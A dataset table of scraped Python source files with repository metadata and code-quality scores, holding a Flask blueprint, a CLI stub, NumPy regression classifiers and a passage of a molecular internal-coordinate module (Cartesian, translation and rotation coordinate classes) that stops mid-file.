hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
234472be1dc2e6a66f78bc106660e43720d56932 | 108 | py | Python | utilities/autoware_launcher/src/autoware_launcher/core/__init__.py | alanjclark/autoware.ai | ba97edbbffb6f22e78912bf96400a59ef6a13daf | [
"Apache-2.0"
] | 20 | 2019-05-21T06:14:17.000Z | 2021-11-03T04:36:09.000Z | ros/src/util/packages/autoware_launcher/src/autoware_launcher/core/__init__.py | anhnv3991/autoware | d5b2ed9dc309193c8a2a7c77a2b6c88104c28328 | [
"Apache-2.0"
] | 40 | 2019-06-24T16:56:15.000Z | 2022-02-28T13:41:58.000Z | ros/src/util/packages/autoware_launcher/src/autoware_launcher/core/__init__.py | anhnv3991/autoware | d5b2ed9dc309193c8a2a7c77a2b6c88104c28328 | [
"Apache-2.0"
] | 31 | 2020-05-29T07:51:58.000Z | 2022-03-26T05:46:33.000Z | from .server import AwLaunchServer
from .server import AwLaunchServerIF
from .server import AwLaunchClientIF | 36 | 36 | 0.87037 | 12 | 108 | 7.833333 | 0.5 | 0.319149 | 0.510638 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101852 | 108 | 3 | 37 | 36 | 0.969072 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
88f259189f5fe236f18d3d9c3f51a36c34843702 | 179 | py | Python | app/blueprints/users/routes.py | bvelica/flask-boilerplate-app | 41362bf9fac63c3ef9989ec2a8cf25da5c407b22 | [
"MIT"
] | null | null | null | app/blueprints/users/routes.py | bvelica/flask-boilerplate-app | 41362bf9fac63c3ef9989ec2a8cf25da5c407b22 | [
"MIT"
] | null | null | null | app/blueprints/users/routes.py | bvelica/flask-boilerplate-app | 41362bf9fac63c3ef9989ec2a8cf25da5c407b22 | [
"MIT"
] | null | null | null |
from flask import Blueprint
blueprint_users = Blueprint('users', __name__, url_prefix='/users')
@blueprint_users.route('/')
def users():
return 'Users page - blueprint users'
| 19.888889 | 67 | 0.743017 | 22 | 179 | 5.727273 | 0.545455 | 0.444444 | 0.301587 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122905 | 179 | 8 | 68 | 22.375 | 0.802548 | 0 | 0 | 0 | 0 | 0 | 0.224719 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0.8 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 7 |
0000fa8f2d70592b5ba91e1ed71c42ac79a16509 | 67 | py | Python | starfiles/deneme.py | harunlakodla/Flutter_Python-flutter_python | 9dfa020fd73bff3bcf965476060ca441349ba96b | [
"Apache-2.0"
] | 10 | 2020-02-02T21:47:34.000Z | 2022-02-05T23:55:15.000Z | starfiles/deneme.py | harunlakodla/Flutter_Python-flutter_python | 9dfa020fd73bff3bcf965476060ca441349ba96b | [
"Apache-2.0"
] | 1 | 2021-11-02T10:43:48.000Z | 2021-11-02T10:43:48.000Z | starfiles/deneme.py | harunlakodla/Flutter_Python-flutter_python | 9dfa020fd73bff3bcf965476060ca441349ba96b | [
"Apache-2.0"
] | null | null | null | print("merhaba")
print("merhaba")
print("merhaba")
print("merhaba") | 16.75 | 16 | 0.716418 | 8 | 67 | 6 | 0.25 | 1 | 1.0625 | 1.5 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044776 | 67 | 4 | 17 | 16.75 | 0.75 | 0 | 0 | 1 | 0 | 0 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 10 |
004e1bbfa4f011603c255ab0bc51ef85830a4426 | 167 | py | Python | cli/commands/cmd_setup.py | kimoantiqe/Sail | c560d71a1ed34c8f762523b826a0d71a2e258f8c | [
"MIT"
] | 1 | 2019-02-16T04:05:11.000Z | 2019-02-16T04:05:11.000Z | cli/commands/cmd_setup.py | kimoantiqe/Sail | c560d71a1ed34c8f762523b826a0d71a2e258f8c | [
"MIT"
] | null | null | null | cli/commands/cmd_setup.py | kimoantiqe/Sail | c560d71a1ed34c8f762523b826a0d71a2e258f8c | [
"MIT"
] | null | null | null | import click
from cli import pass_context
@click.command('setup', short_help='Setups sail on vps')
@pass_context
def cli(ctx):
"""Setups sail on vps"""
#TODO | 18.555556 | 56 | 0.706587 | 26 | 167 | 4.423077 | 0.653846 | 0.191304 | 0.208696 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167665 | 167 | 9 | 57 | 18.555556 | 0.827338 | 0.137725 | 0 | 0 | 0 | 0 | 0.165468 | 0 | 0 | 0 | 0 | 0.111111 | 0 | 1 | 0.2 | false | 0.4 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
cc3980ec5626089db99cbe6d4e98f172f3d7302e | 6,816 | py | Python | scripts/classifiers.py | antjak/epfl-ml-project1 | 66f48afcaa3d82f0a3c4fc5bb4d22e8c20a57272 | [
"CECILL-B"
] | null | null | null | scripts/classifiers.py | antjak/epfl-ml-project1 | 66f48afcaa3d82f0a3c4fc5bb4d22e8c20a57272 | [
"CECILL-B"
] | null | null | null | scripts/classifiers.py | antjak/epfl-ml-project1 | 66f48afcaa3d82f0a3c4fc5bb4d22e8c20a57272 | [
"CECILL-B"
] | 3 | 2019-10-20T05:45:10.000Z | 2021-10-31T15:20:41.000Z | # -*- coding: utf-8 -*-
"""Classifiers"""
import numpy as np
import math
import solver
from implementations import log_1_plus_exp_safe
class LeastSquares:
"""Least squares classifier"""
def __init__(self, verbose=False, max_evaluations=100):
"""
Constructor
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.verbose = verbose
self.max_evaluations = max_evaluations
def fit(self, y, X):
"""
Finds weights to fit the data to the model
:param y: answers
:param X: data
"""
# dimensions
n, d = X.shape
# initial weight vector
self.w = np.zeros(d)
# find weights
self.w = np.linalg.solve(X.T @ X, X.T @ y)
def function_object(self, w, y, X):
"""
Function Object.
:param y: answers
:param X: data
:param w: weights
:return: loss, gradient
"""
# dimensions
n, d = X.shape
# compute error
e = y - X @ w
# compute loss
f = 1/(2 * n) * np.sum(e ** 2)
# compute gradient
g = - 1 / n * X.T @ e
return f, g
def predict(self, X):
"""
Predict
:param X: data
:return: answer prediction
"""
return np.sign(X @ self.w)
class LeastSquaresL2(LeastSquares):
"""L2-regularized Least Squares"""
def __init__(self, lambda_, verbose=False, max_evaluations=100):
"""
Constructor
:param lambda: regularization strength
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.lambda_ = lambda_
super().__init__(verbose, max_evaluations)
def fit(self, y, X):
"""
Finds weights to fit the data to the model
:param y: answers
:param X: data
"""
# dimensions
n, d = X.shape
# initial weight vector
self.w = np.zeros(d)
# find weights
self.w = np.linalg.solve(X.T @ X + n * self.lambda_ * np.eye(d), X.T @ y)
def function_object(self, w, y, X):
"""
Function Object.
:param y: answers
:param X: data
:param w: weights
:return: loss, gradient
"""
f, g = super().function_object(w, y, X)
# add regularization
f += self.lambda_ / 2 * w.dot(w)
g += self.lambda_ * w
return f, g
class LeastSquaresL1(LeastSquares):
"""L1-regularized Least Squares"""
def __init__(self, lambda_, verbose=False, max_evaluations=100):
"""
Constructor
:param lambda: regularization strength
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.lambda_ = lambda_
super().__init__(verbose, max_evaluations)
def fit(self, y, X):
"""
Finds weights to fit the data to the model
:param y: answers
:param X: data
"""
# dimensions
n, d = X.shape
# initial weight vector
self.w = np.zeros(d)
# fit weights
self.w, f = solver.gradient_descent_L1(self.function_object, self.w, self.lambda_,
self.max_evaluations, y, X, verbose=self.verbose)
class LogisticRegression:
"""Logistic Regression"""
def __init__(self, verbose=False, max_evaluations=100):
"""
Constructor
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.verbose = verbose
self.max_evaluations = max_evaluations
def fit(self, y, X):
"""
Finds weights to fit the data to the model
:param y: answers
:param X: data
"""
# dimensions
n, d = X.shape
# initial weight vector
self.w = np.zeros(d)
# fit weights
self.w, f = solver.gradient_descent(self.function_object, self.w,
self.max_evaluations, y, X, verbose=self.verbose)
def function_object(self, w, y, X):
"""
Function Object.
:param y: answers
:param X: data
:param w: weights
:return: loss, gradient
"""
pred = y * X.dot(w)
# function value
f = np.sum(log_1_plus_exp_safe(-pred))
# gradient value
res = - y / (1. + np.exp(pred))
g = X.T.dot(res)
return f, g
def predict(self, X):
"""
Predict
:param X: data
:return: answer prediction
"""
return np.sign(X @ self.w)
class LogisticRegressionL2(LogisticRegression):
"""L2-regularized Logistic Regression"""
def __init__(self, lambda_=1.0, verbose=False, max_evaluations=100):
"""
Constructor
:param lambda_: lambda of L1 regularization
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.verbose = verbose
self.max_evaluations = max_evaluations
self.lambda_ = lambda_
def funObj(self, w, y, X):
"""
Function Object
:param w: weight
:param y: answers
:param X: data
:return: loss, gradient
"""
# Obtain normal loss and gradient using the superclass
f, g = super().funObj(w, y, X)
# Add L2 regularization
f += self.lambda_ / 2. * w.dot(w)
g += self.lambda_ * w
return f, g
class LogisticRegressionL1(LogisticRegression):
"""L1-regularized Logistic Regression"""
def __init__(self, lambda_=1.0, verbose=False, max_evaluations=100):
"""
Constructor
:param lambda_: lambda of L2 regularization
:param verbose: print out information
:param max_evaluations: maximum number of evaluations
"""
self.verbose = verbose
self.max_evaluations = max_evaluations
self.lambda_ = lambda_
def fit(self, y, X):
"""
Finds weights to fit the data to the model
:param y: answers
:param X: data
"""
# dimensions
n, d = X.shape
# initial weight vector
self.w = np.zeros(d)
# fit weights
self.w, f = solver.gradient_descent_L1(self.function_object, self.w, self.lambda_,
self.max_evaluations, y, X, verbose=self.verbose)
| 23.027027 | 96 | 0.537119 | 768 | 6,816 | 4.639323 | 0.136719 | 0.098232 | 0.030873 | 0.045467 | 0.844513 | 0.825989 | 0.813079 | 0.805782 | 0.795116 | 0.795116 | 0 | 0.010402 | 0.365317 | 6,816 | 296 | 97 | 23.027027 | 0.813222 | 0.332453 | 0 | 0.683544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.21519 | false | 0 | 0.050633 | 0 | 0.417722 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cc94dad7e1678fa8496649809f5574320f97aa47 | 42,684 | py | Python | slots.py | EmmanuelG0ldstein/pyGSM_AMS_3 | 87ae69647b469d05b7cdd74eb6996983ab709087 | [
"MIT"
] | null | null | null | slots.py | EmmanuelG0ldstein/pyGSM_AMS_3 | 87ae69647b469d05b7cdd74eb6996983ab709087 | [
"MIT"
] | null | null | null | slots.py | EmmanuelG0ldstein/pyGSM_AMS_3 | 87ae69647b469d05b7cdd74eb6996983ab709087 | [
"MIT"
] | null | null | null | import numpy as np
from .nifty import logger,commadash
from .rotate import get_expmap, get_expmap_der, is_linear
from ._math_utils import d_cross,d_ncross,d_unit_vector,d_cross_ab
class CartesianX(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w=1.0):
self.a = a
self.w = w
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
return "Cartesian-X %i" % (self.a+1)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = self.a == other.a
if eq and self.w != other.w:
logger.warning("Warning: CartesianX same atoms, different weights (%.4f %.4f)" % (self.w, other.w))
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
return xyz[a][0]*self.w
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
derivatives[self.a][0] = self.w
return derivatives
class CartesianY(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w=1.0):
self.a = a
self.w = w
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
# return "Cartesian-Y %i : Weight %.3f" % (self.a+1, self.w)
return "Cartesian-Y %i" % (self.a+1)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = self.a == other.a
if eq and self.w != other.w:
logger.warning("Warning: CartesianY same atoms, different weights (%.4f %.4f)" % (self.w, other.w))
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
return xyz[a][1]*self.w
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
derivatives[self.a][1] = self.w
return derivatives
class CartesianZ(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w=1.0):
self.a = a
self.w = w
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
# return "Cartesian-Z %i : Weight %.3f" % (self.a+1, self.w)
return "Cartesian-Z %i" % (self.a+1)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = self.a == other.a
if eq and self.w != other.w:
logger.warning("Warning: CartesianZ same atoms, different weights (%.4f %.4f)" % (self.w, other.w))
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = self.a
return xyz[a][2]*self.w
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
derivatives[self.a][2] = self.w
return derivatives
class TranslationX(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w):
self.a = a
self.w = w
assert len(a) == len(w)
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
# return "Translation-X %s : Weights %s" % (' '.join([str(i+1) for i in self.a]), ' '.join(['%.2e' % i for i in self.w]))
return "Translation-X %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
if eq and np.sum((self.w-other.w)**2) > 1e-6:
logger.warning("Warning: TranslationX same atoms, different weights")
eq = False
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
return np.sum(xyz[a,0]*self.w)
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
for i, a in enumerate(self.a):
derivatives[a][0] = self.w[i]
return derivatives
class TranslationY(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w):
self.a = a
self.w = w
assert len(a) == len(w)
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
# return "Translation-Y %s : Weights %s" % (' '.join([str(i+1) for i in self.a]), ' '.join(['%.2e' % i for i in self.w]))
return "Translation-Y %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
if eq and np.sum((self.w-other.w)**2) > 1e-6:
logger.warning("Warning: TranslationY same atoms, different weights")
eq = False
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
return np.sum(xyz[a,1]*self.w)
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
for i, a in enumerate(self.a):
derivatives[a][1] = self.w[i]
return derivatives
class TranslationZ(object):
__slots__ = ['a','w','isAngular','isPeriodic']
def __init__(self, a, w):
self.a = a
self.w = w
assert len(a) == len(w)
self.isAngular = False
self.isPeriodic = False
def __repr__(self):
# return "Translation-Z %s : Weights %s" % (' '.join([str(i+1) for i in self.a]), ' '.join(['%.2e' % i for i in self.w]))
return "Translation-Z %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
if eq and np.sum((self.w-other.w)**2) > 1e-6:
logger.warning("Warning: TranslationZ same atoms, different weights")
eq = False
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
xyz = xyz.reshape(-1,3)
a = np.array(self.a)
return np.sum(xyz[a,2]*self.w)
def derivative(self, xyz):
xyz = xyz.reshape(-1,3)
derivatives = np.zeros_like(xyz)
for i, a in enumerate(self.a):
derivatives[a][2] = self.w[i]
return derivatives
class Rotator(object):
__slots__=['a','x0','stored_value','stored_valxyz','stored_deriv','stored_derxyz','stored_norm','e0','stored_dot2','linear']
def __init__(self, a, x0):
self.a = list(tuple(sorted(a)))
x0 = x0.reshape(-1, 3)
self.x0 = x0.copy()
self.stored_valxyz = np.zeros_like(x0)
self.stored_value = None
self.stored_derxyz = np.zeros_like(x0)
self.stored_deriv = None
self.stored_norm = 0.0
# Extra variables to account for the case of linear molecules
# The reference axis used for computing dummy atom position
self.e0 = None
# Dot-squared measures alignment of molecule long axis with reference axis.
# If molecule becomes parallel with reference axis, coordinates must be reset.
self.stored_dot2 = 0.0
# Flag that records linearity of molecule
self.linear = False
def reset(self, x0):
x0 = x0.reshape(-1, 3)
self.x0 = x0.copy()
self.stored_valxyz = np.zeros_like(x0)
self.stored_value = None
self.stored_derxyz = np.zeros_like(x0)
self.stored_deriv = None
self.stored_norm = 0.0
self.e0 = None
self.stored_dot2 = 0.0
self.linear = False
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
if eq and np.sum((self.x0-other.x0)**2) > 1e-6:
logger.warning("Warning: Rotator same atoms, different reference positions")
return eq
def __repr__(self):
return "Rotator %s" % commadash(self.a)
def __ne__(self, other):
return not self.__eq__(other)
def calc_e0(self):
"""
Compute the reference axis for adding dummy atoms.
Only used in the case of linear molecules.
We first find the Cartesian axis that is "most perpendicular" to the molecular axis.
Next we take the cross product with the molecular axis to create a perpendicular vector.
Finally, this perpendicular vector is normalized to make a unit vector.
"""
ysel = self.x0[self.a, :]
vy = ysel[-1]-ysel[0]
ev = vy / np.linalg.norm(vy)
# Cartesian axes.
ex = np.array([1.0,0.0,0.0])
ey = np.array([0.0,1.0,0.0])
ez = np.array([0.0,0.0,1.0])
self.e0 = np.cross(vy, [ex, ey, ez][np.argmin([np.dot(i, ev)**2 for i in [ex, ey, ez]])])
self.e0 /= np.linalg.norm(self.e0)
def value(self, xyz):
xyz = xyz.reshape(-1, 3)
if np.max(np.abs(xyz-self.stored_valxyz)) < 1e-12:
return self.stored_value
else:
xsel = xyz[self.a, :]
ysel = self.x0[self.a, :]
xmean = np.mean(xsel,axis=0)
ymean = np.mean(ysel,axis=0)
if not self.linear and is_linear(xsel, ysel):
# print "Setting linear flag for", self
self.linear = True
if self.linear:
# Handle linear molecules.
vx = xsel[-1]-xsel[0]
vy = ysel[-1]-ysel[0]
# Calculate reference axis (if needed)
if self.e0 is None: self.calc_e0()
#log.debug(vx)
ev = vx / np.linalg.norm(vx)
# Measure alignment of molecular axis with reference axis
self.stored_dot2 = np.dot(ev, self.e0)**2
# Dummy atom is located one Bohr from the molecular center, direction
# given by cross-product of the molecular axis with the reference axis
xdum = np.cross(vx, self.e0)
ydum = np.cross(vy, self.e0)
exdum = xdum / np.linalg.norm(xdum)
eydum = ydum / np.linalg.norm(ydum)
xsel = np.vstack((xsel, exdum+xmean))
ysel = np.vstack((ysel, eydum+ymean))
answer = get_expmap(xsel, ysel)
self.stored_norm = np.linalg.norm(answer)
self.stored_valxyz = xyz.copy()
self.stored_value = answer
return answer
def derivative(self, xyz):
xyz = xyz.reshape(-1, 3)
if np.max(np.abs(xyz-self.stored_derxyz)) < 1e-12:
return self.stored_deriv
else:
xsel = xyz[self.a, :]
ysel = self.x0[self.a, :]
xmean = np.mean(xsel,axis=0)
ymean = np.mean(ysel,axis=0)
if not self.linear and is_linear(xsel, ysel):
# print "Setting linear flag for", self
self.linear = True
if self.linear:
vx = xsel[-1]-xsel[0]
vy = ysel[-1]-ysel[0]
if self.e0 is None: self.calc_e0()
xdum = np.cross(vx, self.e0)
ydum = np.cross(vy, self.e0)
exdum = xdum / np.linalg.norm(xdum)
eydum = ydum / np.linalg.norm(ydum)
xsel = np.vstack((xsel, exdum+xmean))
ysel = np.vstack((ysel, eydum+ymean))
deriv_raw = get_expmap_der(xsel, ysel)
if self.linear:
# Chain rule is applied to get terms from
# dummy atom derivatives
nxdum = np.linalg.norm(xdum)
dxdum = d_cross(vx, self.e0)
dnxdum = d_ncross(vx, self.e0)
# Derivative of dummy atom position w/r.t. molecular axis vector
dexdum = (dxdum*nxdum - np.outer(dnxdum,xdum))/nxdum**2
# Here we may compute finite difference derivatives to check
# h = 1e-6
# fdxdum = np.zeros((3, 3), dtype=float)
# for i in range(3):
# vx[i] += h
# dPlus = np.cross(vx, self.e0)
# dPlus /= np.linalg.norm(dPlus)
# vx[i] -= 2*h
# dMinus = np.cross(vx, self.e0)
# dMinus /= np.linalg.norm(dMinus)
# vx[i] += h
# fdxdum[i] = (dPlus-dMinus)/(2*h)
# if np.linalg.norm(dexdum - fdxdum) > 1e-6:
# print dexdum - fdxdum
# raise Exception()
# Apply terms from chain rule
deriv_raw[0] -= np.dot(dexdum, deriv_raw[-1])
for i in range(len(self.a)):
deriv_raw[i] += np.dot(np.eye(3), deriv_raw[-1])/len(self.a)
deriv_raw[-2] += np.dot(dexdum, deriv_raw[-1])
deriv_raw = deriv_raw[:-1]
derivatives = np.zeros((xyz.shape[0], 3, 3), dtype=float)
for i, a in enumerate(self.a):
derivatives[a, :, :] = deriv_raw[i, :, :]
self.stored_derxyz = xyz.copy()
self.stored_deriv = derivatives
return derivatives
class RotationA(object):
__slots__=['a','x0','w','Rotator','isAngular','isPeriodic']
def __init__(self, a, x0, Rotators, w=1.0):
self.a = tuple(sorted(a))
self.x0 = x0
self.w = w
if self.a not in Rotators:
Rotators[self.a] = Rotator(self.a, x0)
self.Rotator = Rotators[self.a]
self.isAngular = True
self.isPeriodic = False
def __repr__(self):
# return "Rotation-A %s : Weight %.3f" % (' '.join([str(i+1) for i in self.a]), self.w)
return "Rotation-A %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
# if eq and np.sum((self.w-other.w)**2) > 1e-6:
# print "Warning: RotationA same atoms, different weights"
# if eq and np.sum((self.x0-other.x0)**2) > 1e-6:
# print "Warning: RotationA same atoms, different reference positions"
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
return self.Rotator.value(xyz)[0]*self.w
def derivative(self, xyz):
der_all = self.Rotator.derivative(xyz)
derivatives = der_all[:, :, 0]*self.w
return derivatives
class RotationB(object):
__slots__=['a','x0','w','Rotator','isAngular','isPeriodic']
def __init__(self, a, x0, Rotators, w=1.0):
self.a = tuple(sorted(a))
self.x0 = x0
self.w = w
if self.a not in Rotators:
Rotators[self.a] = Rotator(self.a, x0)
self.Rotator = Rotators[self.a]
self.isAngular = True
self.isPeriodic = False
def __repr__(self):
# return "Rotation-B %s : Weight %.3f" % (' '.join([str(i+1) for i in self.a]), self.w)
return "Rotation-B %s" % (commadash(self.a))
@property
def atoms(self):
return list(self.a)
def __eq__(self, other):
if type(self) is not type(other): return False
eq = set(self.a) == set(other.a)
# if eq and np.sum((self.w-other.w)**2) > 1e-6:
# print "Warning: RotationB same atoms, different weights"
# if eq and np.sum((self.x0-other.x0)**2) > 1e-6:
# print "Warning: RotationB same atoms, different reference positions"
return eq
def __ne__(self, other):
return not self.__eq__(other)
def value(self, xyz):
return self.Rotator.value(xyz)[1]*self.w
def derivative(self, xyz):
der_all = self.Rotator.derivative(xyz)
derivatives = der_all[:, :, 1]*self.w
return derivatives
class RotationC(object):
